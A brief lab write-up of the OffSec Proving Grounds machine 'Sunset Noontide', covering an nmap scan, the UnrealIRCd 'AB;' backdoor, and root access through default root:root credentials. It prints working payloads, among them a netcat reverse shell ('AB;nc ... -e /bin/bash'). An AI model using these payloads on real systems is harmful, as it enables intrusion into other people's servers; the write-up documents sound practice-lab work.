OffSec PG - Sunset Noontide


Machine IP →

Network Scan

Nmap scan → nmap -sC -sV -Pn -p- -A -o nmap.txt

OS Detection → Host:

PortServiceOther details (if any)
6667, 6697, 8067IRCUnrealIRCd


The only service is an IRC, so searched exploit db via searchsploit for an exploit. This returned 4 entries. Looking at the code for the first one, there seems to be a backdoor which allows execution of shell commands when anything start with AB;.

Therefore, access can be checked by connecting to the IRCd via netcat and sending the the payload as AB;echo "a" | nc 3002. With a listener active on the attacking machine with the IP as in the payload, a conection and the letter “a” would be received.

Therefore, a similar payload can be used to receive shell via nc → AB;nc 3002 -e /bin/bash. This gives a shell as the server user. The home directory has the user flag.

Privilege Escalation

With the shell of the server user, trying default creds of root:root works for getting the shell to root. This gives the root flag.

This post is licensed under CC BY 4.0 by the author.